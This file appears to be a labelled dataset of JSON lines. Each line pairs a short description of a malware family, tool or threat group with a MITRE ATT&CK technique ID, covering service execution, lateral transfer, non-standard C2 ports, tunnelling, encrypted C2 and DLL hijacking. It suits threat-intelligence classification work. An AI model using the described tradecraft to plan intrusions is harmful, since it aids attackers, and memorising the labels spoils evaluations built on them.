{"text1":"Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services.","labels":"['T1569.002']"}
|
|
{"text1":"During Operation Honeybee, threat actors ran \"sc start\" to start the COMSysApp as part of the service hijacking and \"sc stop\" to stop and reconfigure the COMSysApp.","labels":"['T1569.002']"}
|
|
{"text1":"During Operation Wocao, threat actors created services on remote systems for execution purposes.","labels":"['T1569.002']"}
|
|
{"text1":"Empire can use PsExec to execute a payload on a remote host.","labels":"['T1569.002']"}
|
|
{"text1":"FIN6 has created Windows services to execute encoded PowerShell commands.","labels":"['T1569.002']"}
|
|
{"text1":"HOPLIGHT has used svchost.exe to execute a malicious DLL.","labels":"['T1569.002']"}
|
|
{"text1":"HermeticWiper can create system services to aid in executing the payload.","labels":"['T1569.002']"}
|
|
{"text1":"HermeticWizard can use `OpenRemoteServiceManager` to create a service.","labels":"['T1569.002']"}
|
|
{"text1":"Honeybee launches a DLL file that gets executed as a service using svchost.exe.","labels":"['T1569.002']"}
|
|
{"text1":"Hydraq uses svchost.exe to execute a malicious DLL included in a new service group.","labels":"['T1569.002']"}
|
|
{"text1":"HyperBro has the ability to start and stop a specified service.","labels":"['T1569.002']"}
|
|
{"text1":"Impacket contains various modules emulating other service execution tools such as PsExec.","labels":"['T1569.002']"}
|
|
{"text1":"InvisiMole has used Windows services as a way to execute its malicious payload.","labels":"['T1569.002']"}
|
|
{"text1":"Ke3chang has used a tool known as RemoteExec (similar to PsExec) to remotely execute batch scripts and binaries.","labels":"['T1569.002']"}
|
|
{"text1":"Koadic can run a command on another machine using PsExec.","labels":"['T1569.002']"}
|
|
{"text1":"LoudMiner started the cryptomining virtual machine as a service on the infected machine.","labels":"['T1569.002']"}
|
|
{"text1":"NotPetya can use PsExec to help propagate itself across a network.","labels":"['T1569.002']"}
|
|
{"text1":"Okrum's loader can create a new service named NtmsSvc to execute the payload.","labels":"['T1569.002']"}
|
|
{"text1":"Olympic Destroyer utilizes PsExec to help propagate itself across a network.","labels":"['T1569.002']"}
|
|
{"text1":"Operation Wocao has created services on remote systems for execution purposes.","labels":"['T1569.002']"}
|
|
{"text1":"PoshC2 contains an implementation of PsExec for remote execution.","labels":"['T1569.002']"}
|
|
{"text1":"Proxysvc registers itself as a service on the victim\u2019s machine to run as a standalone process.","labels":"['T1569.002']"}
|
|
{"text1":"Pupy uses PsExec to execute a payload or commands on a remote host.","labels":"['T1569.002']"}
|
|
{"text1":"RemoteCMD can execute commands remotely by creating a new service on the remote system.","labels":"['T1569.002']"}
|
|
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Shamoon can also spread via PsExec.","labels":"['T1569.002']"}
|
|
{"text1":"SysUpdate can manage services and processes.","labels":"['T1569.002']"}
|
|
{"text1":"The \"net start\" and \"net stop\" commands can be used in Net to execute or stop Windows services.","labels":"['T1569.002']"}
|
|
{"text1":"TinyTurla can install itself as a service on compromised machines.","labels":"['T1569.002']"}
|
|
{"text1":"WastedLocker can execute itself as a service.","labels":"['T1569.002']"}
|
|
{"text1":"Winexe installs a service on the remote system, executes the command, then uninstalls the service.","labels":"['T1569.002']"}
|
|
{"text1":"Winnti for Windows can run as a service using svchost.exe.","labels":"['T1569.002']"}
|
|
{"text1":"Wizard Spider has used services.exe to execute scripts and executables during lateral movement within a victim network.","labels":"['T1569.002']"}
|
|
{"text1":"APT32 has deployed tools after moving laterally using administrative accounts.","labels":"['T1570']"}
|
|
{"text1":"Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices.","labels":"['T1570']"}
|
|
{"text1":"BITSAdmin can be used to create BITS Jobs to upload and\/or download files from SMB file servers.","labels":"['T1570']"}
|
|
{"text1":"Chimera has copied tools between compromised hosts using SMB.","labels":"['T1570']"}
|
|
{"text1":"During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.","labels":"['T1570']"}
|
|
{"text1":"DustySky searches for network drives and removable media and duplicates itself onto them.","labels":"['T1570']"}
|
|
{"text1":"Expand can be used to download or upload a file over a network share.","labels":"['T1570']"}
|
|
{"text1":"FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.","labels":"['T1570']"}
|
|
{"text1":"GALLIUM has used PsExec to move laterally between hosts in the target network.","labels":"['T1570']"}
|
|
{"text1":"HermeticWizard can copy files to other machines on a compromised network.","labels":"['T1570']"}
|
|
{"text1":"Kerrdown can download additional software including Cobalt Strike from servers on the victim's network.","labels":"['T1570']"}
|
|
{"text1":"LockerGoga has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files from computer to computer instead of self-propagating.","labels":"['T1570']"}
|
|
{"text1":"Olympic Destroyer attempts to copy itself to remote machines on the network.","labels":"['T1570']"}
|
|
{"text1":"Operation Wocao has used SMB to copy files to and from target systems.","labels":"['T1570']"}
|
|
{"text1":"PsExec can be used to download or upload a file over a network share.","labels":"['T1570']"}
|
|
{"text1":"Sandworm Team has used `move` to transfer files to a network share.","labels":"['T1570']"}
|
|
{"text1":"Shamoon attempts to copy itself to remote machines on the network.","labels":"['T1570']"}
|
|
{"text1":"Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.","labels":"['T1570']"}
|
|
{"text1":"Turla RPC backdoors can be used to transfer files to\/from victim machines on the local network.","labels":"['T1570']"}
|
|
{"text1":"WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.","labels":"['T1570']"}
|
|
{"text1":"Wizard Spider has used stolen credentials to copy tools into the \"%TEMP%\" directory of domain controllers.","labels":"['T1570']"}
|
|
{"text1":"cmd can be used to copy files to\/from a remotely connected internal system.","labels":"['T1570']"}
|
|
{"text1":"esentutl can be used to copy files to\/from a remote share.","labels":"['T1570']"}
|
|
{"text1":"ftp may be abused by adversaries to transfer tools or files between systems within a compromised environment.","labels":"['T1570']"}
|
|
{"text1":"APT-C-36 has used port 4050 for C2 communications.","labels":"['T1571']"}
|
|
{"text1":"APT33 has used HTTP over TCP ports 808 and 880 for command and control.","labels":"['T1571']"}
|
|
{"text1":"An APT32 backdoor can use HTTP over a non-standard TCP port (e.g., 14146) which is specified in the backdoor configuration.","labels":"['T1571']"}
|
|
{"text1":"BADCALL communicates on ports 443 and 8000 with a FakeTLS method.","labels":"['T1571']"}
|
|
{"text1":"Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.","labels":"['T1571']"}
|
|
{"text1":"BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.","labels":"['T1571']"}
|
|
{"text1":"Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.","labels":"['T1571']"}
|
|
{"text1":"DarkVishnya used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.","labels":"['T1571']"}
|
|
{"text1":"Derusbi has used unencrypted HTTP on port 443 for C2.","labels":"['T1571']"}
|
|
{"text1":"Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP\/S.","labels":"['T1571']"}
|
|
{"text1":"FIN7 has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.","labels":"['T1571']"}
|
|
{"text1":"GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.","labels":"['T1571']"}
|
|
{"text1":"GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.","labels":"['T1571']"}
|
|
{"text1":"HARDRAIN binds and listens on port 443 with a FakeTLS method.","labels":"['T1571']"}
|
|
{"text1":"HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.","labels":"['T1571']"}
|
|
{"text1":"Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.","labels":"['T1571']"}
|
|
{"text1":"Metamorfo has communicated with hosts over raw TCP on port 9999.","labels":"['T1571']"}
|
|
{"text1":"PoetRAT used TLS to encrypt communications over port 143.","labels":"['T1571']"}
|
|
{"text1":"QuasarRAT can use port 4782 on the compromised host for TCP callbacks.","labels":"['T1571']"}
|
|
{"text1":"RTM used Port 44443 for its VNC module.","labels":"['T1571']"}
|
|
{"text1":"Rocke's miner connects to a C2 server using port 51640.","labels":"['T1571']"}
|
|
{"text1":"Sandworm Team has used port 6789 to accept connections on the group's SSH server.","labels":"['T1571']"}
|
|
{"text1":"Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.","labels":"['T1571']"}
|
|
{"text1":"TEMP.Veles has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.","labels":"['T1571']"}
|
|
{"text1":"TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.","labels":"['T1571']"}
|
|
{"text1":"WIRTE has used HTTPS over ports 2083 and 2087 for C2.","labels":"['T1571']"}
|
|
{"text1":"WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.","labels":"['T1571']"}
|
|
{"text1":"Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.","labels":"['T1572']"}
|
|
{"text1":"Cobalt Group has used the Plink utility to create SSH tunnels.","labels":"['T1572', 'T1573.002']"}
|
|
{"text1":"CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.","labels":"['T1572']"}
|
|
{"text1":"Cyclops Blink can use DNS over HTTPS (DoH) to resolve C2 nodes.","labels":"['T1572']"}
|
|
{"text1":"During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.","labels":"['T1572']"}
|
|
{"text1":"FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.","labels":"['T1572', 'T1573.002']"}
|
|
{"text1":"Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.","labels":"['T1572']"}
|
|
{"text1":"Industroyer attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.","labels":"['T1572']"}
|
|
{"text1":"Kevin can use a custom protocol tunneled through DNS or HTTP.","labels":"['T1572']"}
|
|
{"text1":"Milan can use a custom protocol tunneled through DNS or HTTP.","labels":"['T1572']"}
|
|
{"text1":"Mythic can use SOCKS proxies to tunnel traffic through another protocol.","labels":"['T1572']"}
|
|
{"text1":"Ngrok can tunnel RDP and other services securely over internet connections.","labels":"['T1572']"}
|
|
{"text1":"OilRig has used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1572']"}
|
|
{"text1":"The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.","labels":"['T1572']"}
|
|
{"text1":"APT29 has used multiple layers of encryption within malware to protect C2 communication.","labels":"['T1573']"}
|
|
{"text1":"BITTER has encrypted their C2 communications.","labels":"['T1573']"}
|
|
{"text1":"Cryptoistic can engage in encrypted communications with C2.","labels":"['T1573']"}
|
|
{"text1":"Lizar can support encrypted communications between the client and server.","labels":"['T1573']"}
|
|
{"text1":"NETWIRE can encrypt C2 communications.","labels":"['T1573']"}
|
|
{"text1":"PowGoop can receive encrypted commands from C2.","labels":"['T1573']"}
|
|
{"text1":"PowerLess can use an encrypted channel for C2 communications.","labels":"['T1573']"}
|
|
{"text1":"RCSession can use an encrypted beacon to check in with C2.","labels":"['T1573']"}
|
|
{"text1":"Tropic Trooper has encrypted traffic with the C2 to prevent network detection.","labels":"['T1573']"}
|
|
{"text1":"gh0st RAT has encrypted TCP communications to evade detection.","labels":"['T1573']"}
|
|
{"text1":"A variant of ADVSTORESHELL encrypts some C2 with 3DES.","labels":"['T1573.001']"}
|
|
{"text1":"APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.","labels":"['T1573.001']"}
|
|
{"text1":"APT33 has used AES for encryption of command and control traffic.","labels":"['T1573.001']"}
|
|
{"text1":"Attor has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.","labels":"['T1573.001']"}
|
|
{"text1":"Azorult can encrypt C2 traffic using XOR.","labels":"['T1573.001']"}
|
|
{"text1":"BADCALL encrypts C2 traffic using an XOR\/ADD cipher.","labels":"['T1573.001']"}
|
|
{"text1":"BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.","labels":"['T1573.001']"}
|
|
{"text1":"BBSRAT uses a custom encryption algorithm on data sent back to the C2 server over HTTP.","labels":"['T1573.001']"}
|
|
{"text1":"BLINDINGCAN has encrypted its C2 traffic with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.","labels":"['T1573.001']"}
|
|
{"text1":"Bandook has used AES encryption for C2 communication.","labels":"['T1573.001']"}
|
|
{"text1":"Bazar can send C2 communications with XOR encryption.","labels":"['T1573.001']"}
|
|
{"text1":"Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.","labels":"['T1573.001']"}
|
|
{"text1":"Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"Bonadan can XOR-encrypt C2 communications.","labels":"['T1573.001']"}
|
|
{"text1":"Bumblebee can encrypt C2 requests and responses with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"CHOPSTICK encrypts C2 communications with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.","labels":"['T1573.001']"}
|
|
{"text1":"CallMe uses AES to encrypt C2 traffic.","labels":"['T1573.001']"}
|
|
{"text1":"Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications.","labels":"['T1573.001']"}
|
|
{"text1":"ChChes can encrypt C2 traffic with AES or RC4.","labels":"['T1573.001']"}
|
|
{"text1":"Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.","labels":"['T1573.001']"}
|
|
{"text1":"Comnie encrypts command and control communications with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error.","labels":"['T1573.001']"}
|
|
{"text1":"Darkhotel has used AES-256 and 3DES for C2 communications.","labels":"['T1573.001']"}
|
|
{"text1":"Dipsind encrypts C2 data with AES256 in ECB mode.","labels":"['T1573.001']"}
|
|
{"text1":"Dridex has encrypted traffic with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.","labels":"['T1573.001']"}
|
|
{"text1":"Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.","labels":"['T1573.001']"}
|
|
{"text1":"Elise encrypts exfiltrated data with RC4.","labels":"['T1573.001']"}
|
|
{"text1":"Epic encrypts commands from the C2 server using a hardcoded key.","labels":"['T1573.001']"}
|
|
{"text1":"FALLCHILL encrypts C2 data with RC4 encryption.","labels":"['T1573.001']"}
|
|
{"text1":"FatDuke can AES encrypt C2 communications.","labels":"['T1573.001']"}
|
|
{"text1":"FlawedAmmyy has used SEAL encryption during the initial C2 handshake.","labels":"['T1573.001']"}
|
|
{"text1":"FoggyWeb has used a dynamic XOR key and custom XOR methodology for C2 communications.","labels":"['T1573.001']"}
|
|
{"text1":"Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.","labels":"['T1573.001']"}
|
|
{"text1":"Gazer uses custom encryption for C2 that uses 3DES.","labels":"['T1573.001']"}
{"text1":"GreyEnergy encrypts communications using AES256.","labels":"['T1573.001']"}
{"text1":"GrimAgent can use an AES key to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"H1N1 encrypts C2 traffic using an RC4 key.","labels":"['T1573.001']"}
{"text1":"Helminth encrypts data sent to its C2 server over HTTP with RC4.","labels":"['T1573.001']"}
{"text1":"HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.","labels":"['T1573.001']"}
{"text1":"Higaisa used AES-128 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"Hikit performs XOR encryption.","labels":"['T1573.001']"}
{"text1":"HyperStack has used RSA encryption for C2 communications.","labels":"['T1573.001']"}
{"text1":"KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.","labels":"['T1573.001']"}
{"text1":"LightNeuron uses AES to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"LookBack uses a modified version of RC4 for data transfer.","labels":"['T1573.001']"}
{"text1":"Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.","labels":"['T1573.001']"}
{"text1":"Lurid performs XOR encryption.","labels":"['T1573.001']"}
{"text1":"Machete has used AES to exfiltrate documents.","labels":"['T1573.001']"}
{"text1":"Metamorfo has encrypted C2 commands with AES-256.","labels":"['T1573.001']"}
{"text1":"More_eggs has used an RC4-based encryption method for its C2 communications.","labels":"['T1573.001']"}
{"text1":"Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.","labels":"['T1573.001']"}
{"text1":"MuddyWater has used AES to encrypt C2 responses.","labels":"['T1573.001']"}
{"text1":"Mustang Panda has encrypted C2 communications with RC4.","labels":"['T1573.001']"}
{"text1":"NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.","labels":"['T1573.001']"}
{"text1":"NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"","labels":"['T1573.001']"}
{"text1":"NETWIRE can use AES encryption for C2 data transferred.","labels":"['T1573.001']"}
{"text1":"NanoCore uses DES to encrypt the C2 traffic.","labels":"['T1573.001']"}
{"text1":"PLAINTEE encodes C2 beacons using XOR.","labels":"['T1573.001']"}
{"text1":"PLEAD has used RC4 encryption to download modules.","labels":"['T1573.001']"}
{"text1":"POWERTON has used AES for encrypting C2 traffic.","labels":"['T1573.001']"}
{"text1":"Pandora has the ability to encrypt communications with D3DES.","labels":"['T1573.001']"}
{"text1":"PingPull can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.","labels":"['T1573.001']"}
{"text1":"PlugX can use RC4 encryption in C2 communications.","labels":"['T1573.001']"}
{"text1":"PoisonIvy uses the Camellia cipher to encrypt communications.","labels":"['T1573.001']"}
{"text1":"Prikormka encrypts some C2 traffic with the Blowfish cipher.","labels":"['T1573.001']"}
{"text1":"QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.","labels":"['T1573.001']"}
{"text1":"RDAT has used AES ciphertext to encode C2 communications.","labels":"['T1573.001']"}
{"text1":"RainyDay can use RC4 to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"Rifdoor has encrypted command and control (C2) communications with a stream cipher.","labels":"['T1573.001']"}
{"text1":"SeaDuke C2 traffic has been encrypted with RC4 and AES.","labels":"['T1573.001']"}
{"text1":"Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"SideTwist can encrypt C2 communications with a randomly generated key.","labels":"['T1573.001']"}
{"text1":"Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange.","labels":"['T1573.001']"}
{"text1":"SodaMaster can use RC4 to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"SombRAT has encrypted its C2 communications with AES.","labels":"['T1573.001']"}
{"text1":"Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.","labels":"['T1573.001']"}
{"text1":"Some versions of UPPERCUT have used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.","labels":"['T1573.001']"}
{"text1":"Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key.","labels":"['T1573.001']"}
{"text1":"StrifeWater can encrypt C2 traffic using XOR with a hard coded key.","labels":"['T1573.001']"}
{"text1":"Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.","labels":"['T1573.001']"}
{"text1":"Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.","labels":"['T1573.001']"}
{"text1":"TAINTEDSCRIBE uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.","labels":"['T1573.001']"}
{"text1":"TSCookie has encrypted network communications with RC4.","labels":"['T1573.001']"}
{"text1":"Taidoor uses RC4 to encrypt the message body of HTTP content.","labels":"['T1573.001']"}
{"text1":"The Duqu command and control protocol's data stream can be encrypted with AES-CBC.","labels":"['T1573.001']"}
{"text1":"The IceApple Result Retriever module can AES encrypt C2 responses.","labels":"['T1573.001']"}
{"text1":"The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"Volgmer uses a simple XOR cipher to encrypt traffic and files.","labels":"['T1573.001']"}
{"text1":"WarzoneRAT can encrypt its C2 with RC4 with the password `warzone160\\x00`.","labels":"['T1573.001']"}
{"text1":"Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control (C2).","labels":"['T1573.001']"}
{"text1":"Winnti for Windows can XOR encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"XCSSET uses RC4 encryption over TCP to communicate with its C2 server.","labels":"['T1573.001']"}
{"text1":"ZeroT has used RC4 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"down_new has the ability to AES encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"gh0st RAT uses RC4 and XOR to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"httpclient encrypts C2 content with XOR using a single byte, 0x12.","labels":"['T1573.001']"}
{"text1":"xCaon has encrypted data sent to the C2 server using a XOR key.","labels":"['T1573.001']"}
{"text1":"Attor's Blowfish key is encrypted with a public RSA key.","labels":"['T1573.002']"}
{"text1":"BISCUIT uses SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"Bazar can use TLS in C2 communications.","labels":"['T1573.002']"}
{"text1":"CHOPSTICK encrypts C2 communications with TLS.","labels":"['T1573.002']"}
{"text1":"Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.","labels":"['T1573.002']"}
{"text1":"DarkWatchman can use TLS to encrypt its C2 channel.","labels":"['T1573.002']"}
{"text1":"Dridex has encrypted traffic with RSA.","labels":"['T1573.002']"}
{"text1":"During Operation Wocao, threat actors' proxy implementation \"Agent\" upgraded the socket in use to a TLS socket.","labels":"['T1573.002']"}
{"text1":"Empire can use TLS to encrypt its C2 channel.","labels":"['T1573.002']"}
{"text1":"FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.","labels":"['T1573.002']"}
{"text1":"GoldMax has RSA-encrypted its communication with the C2 server.","labels":"['T1573.002']"}
{"text1":"GreyEnergy encrypts communications using RSA-2048.","labels":"['T1573.002']"}
{"text1":"GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2.","labels":"['T1573.002']"}
{"text1":"Hi-Zor encrypts C2 traffic with TLS.","labels":"['T1573.002']"}
{"text1":"IcedID has used SSL and TLS in communications with C2.","labels":"['T1573.002']"}
{"text1":"Kobalos's authentication and key exchange is performed using RSA-512.","labels":"['T1573.002']"}
{"text1":"Machete has used TLS-encrypted FTP to exfiltrate data.","labels":"['T1573.002']"}
{"text1":"Metamorfo's C2 communication has been encrypted using OpenSSL.","labels":"['T1573.002']"}
{"text1":"OilRig used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1573.002']"}
{"text1":"POSHSPY encrypts C2 traffic with AES and RSA.","labels":"['T1573.002']"}
{"text1":"POWERSTATS has encrypted C2 traffic with RSA.","labels":"['T1573.002']"}
{"text1":"Pay2Key has used RSA encrypted communications with C2.","labels":"['T1573.002']"}
{"text1":"Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.","labels":"['T1573.002']"}
{"text1":"PoetRAT used TLS to encrypt command and control (C2) communications.","labels":"['T1573.002']"}
{"text1":"Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.","labels":"['T1573.002']"}
{"text1":"REvil has encrypted C2 communications with the ECIES algorithm.","labels":"['T1573.002']"}
{"text1":"Rising Sun variants can use SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"Sliver can use mutual TLS and RSA cryptography to exchange a session key.","labels":"['T1573.002']"}
{"text1":"Small Sieve can use SSL\/TLS for its HTTPS Telegram Bot API-based C2 channel.","labels":"['T1573.002']"}
{"text1":"SombRAT can SSL encrypt C2 traffic.","labels":"['T1573.002']"}
{"text1":"Some Volgmer variants use SSL to encrypt C2 communications.","labels":"['T1573.002']"}
{"text1":"StrongPity has encrypted C2 traffic using SSL\/TLS.","labels":"['T1573.002']"}
{"text1":"Sykipot uses SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"TinyTurla has the ability to encrypt C2 traffic with SSL\/TLS.","labels":"['T1573.002']"}
{"text1":"Trojan.Karagany can secure C2 communications with SSL and TLS.","labels":"['T1573.002']"}
{"text1":"Tropic Trooper has used SSL to connect to C2 servers.","labels":"['T1573.002']"}
{"text1":"WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.","labels":"['T1573.002']"}
{"text1":"WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.","labels":"['T1573.002']"}
{"text1":"WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.","labels":"['T1573.002']"}
{"text1":"XTunnel uses SSL\/TLS and RC4 to encrypt traffic.","labels":"['T1573.002']"}
{"text1":"Zebrocy uses SSL and AES ECB for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.","labels":"['T1573.002']"}
{"text1":"ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.","labels":"['T1574']"}
{"text1":"A FinFisher variant uses DLL search order hijacking.","labels":"['T1574.001']"}
{"text1":"APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.","labels":"['T1574.001']"}
{"text1":"Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.","labels":"['T1574.001']"}
{"text1":"Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.","labels":"['T1574.001']"}
{"text1":"Empire contains modules that can discover and exploit various DLL hijacking opportunities.","labels":"['T1574.001']"}
{"text1":"FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.","labels":"['T1574.001']"}
{"text1":"Hikit has used DLL Search Order Hijacking to load \"oci.dll\" as a persistence mechanism.","labels":"['T1574.001']"}
{"text1":"InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.","labels":"['T1574.001']"}
{"text1":"Melcoz can use DLL hijacking to bypass security controls.","labels":"['T1574.001']"}
{"text1":"MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.","labels":"['T1574.001']"}
{"text1":"PlugX has the ability to use DLL search order hijacking for installation on targeted systems.","labels":"['T1574.001']"}
{"text1":"PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.","labels":"['T1574.001']"}
{"text1":"RTM has used search order hijacking to force TeamViewer to load a malicious DLL.","labels":"['T1574.001']"}
{"text1":"RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.","labels":"['T1574.001']"}
{"text1":"Threat Group-3390 has performed DLL search order hijacking to execute their payload.","labels":"['T1574.001']"}
{"text1":"Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to \"%SYSTEMROOT%\" (\"C:\\WINDOWS\\ntshrui.dll\").","labels":"['T1574.001']"}
{"text1":"WastedLocker has performed DLL hijacking before execution.","labels":"['T1574.001']"}
{"text1":"Whitefly has used search order hijacking to run the loader Vcrodat.","labels":"['T1574.001']"}
{"text1":"A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading.","labels":"['T1574.002']"}
{"text1":"A gh0st RAT variant has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.","labels":"['T1574.002']"}
{"text1":"APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools.","labels":"['T1574.002']"}
{"text1":"APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).","labels":"['T1574.002']"}
{"text1":"APT41 used legitimate executables to perform DLL side-loading of their malware.","labels":"['T1574.002']"}
{"text1":"BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable.","labels":"['T1574.002']"}
{"text1":"BRONZE BUTLER has used legitimate applications to side-load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.","labels":"['T1574.002']"}
